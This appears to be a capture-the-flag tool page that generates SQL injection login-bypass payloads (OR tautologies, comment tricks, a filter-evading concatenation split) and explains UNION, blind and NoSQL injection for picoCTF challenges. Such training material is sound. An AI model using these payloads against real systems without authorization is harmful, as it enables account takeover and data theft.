Tools / SQL Injection Payload Generator
SQL Injection Payload Generator
Generate ready-to-use SQL injection payloads for the most common attack types. Pick a technique, configure the target database and parameters, and copy the output directly into a form field or curl command. Covers MySQL, PostgreSQL, SQLite, and MSSQL.
Database
Target username
OR tautology
' OR 1=1-- -OR tautology (hash comment)mysql
' OR 1=1#Log in as admin (comment out password)
admin'-- -String tautology (no comment needed)
' OR 'a'='aParentheses variant
') OR ('1'='1Double-quote variant
" OR "1"="1admin with always-true OR
admin' OR '1'='1Concat split bypass (OR/keyword blocked)sqlitepostgresql
adm'||'inSplits 'admin' across || so the literal word never appears in the input. Works in SQLite and PostgreSQL when OR is filtered.
Usage
Paste the payload into the username field; enter anything for the password. The comment sequence (-- -) discards the rest of the query including the password check. Enable ROT13 above for challenges where the server ROT13-decodes your input before querying (Irish-Name-Repo 3).
SQL injection in CTF challenges
SQL injection (SQLi) is consistently one of the most tested vulnerability categories in picoCTF and similar competitions. The root cause is always the same: user-supplied input is concatenated directly into a SQL query string instead of being passed as a bound parameter. The database then executes the attacker input as SQL syntax.
Auth bypass is the entry point for most beginner challenges. Entering a payload like ' OR 1=1-- - as the username makes the WHERE clause always true, granting login without a valid password. The -- - comments out the rest of the query including the password check.
UNION extraction appends a second SELECT to the original query and injects its output into the page. You first probe the column count with ORDER BY, find which column reflects to the page, then use that position to pull table names, column names, and finally the flag data.
Blind injection applies when query results are never echoed. Boolean-based blind injection compares two response shapes (one with a true condition, one with false) to infer character values one at a time. Time-based blind injection uses SLEEP() or equivalent to signal true/false via response delay. Both techniques are tedious to run manually; sqlmap automates them.
NoSQL injection targets document stores like MongoDB. Instead of SQL syntax, you inject query operators ( $ne, $gt, $regex) when the server deserializes the POST body directly into a query object without validation.
For a full technique walkthrough with picoCTF challenge examples at every level, see the SQL Injection for CTF guide.
Challenges that use this tool
- Sql Map1picoCTF 2026 · Web Exploitation · Medium
- No Sql InjectionpicoCTF 2024 · Web Exploitation · Medium
- More SQLipicoCTF 2023 · Web Exploitation · Medium
- SQLiLitepicoCTF 2022 · Web Exploitation · Medium
- Web Gauntlet 2picoCTF 2021 · Web Exploitation · Medium
- Web Gauntlet 3picoCTF 2021 · Web Exploitation · Medium
- Web GauntletpicoCTF 2020 Mini-Competition · Web Exploitation · Medium
- Irish-Name-Repo 1picoCTF 2019 · Web Exploitation · Medium
- Irish-Name-Repo 2picoCTF 2019 · Web Exploitation · Medium
- Irish-Name-Repo 3picoCTF 2019 · Web Exploitation · Medium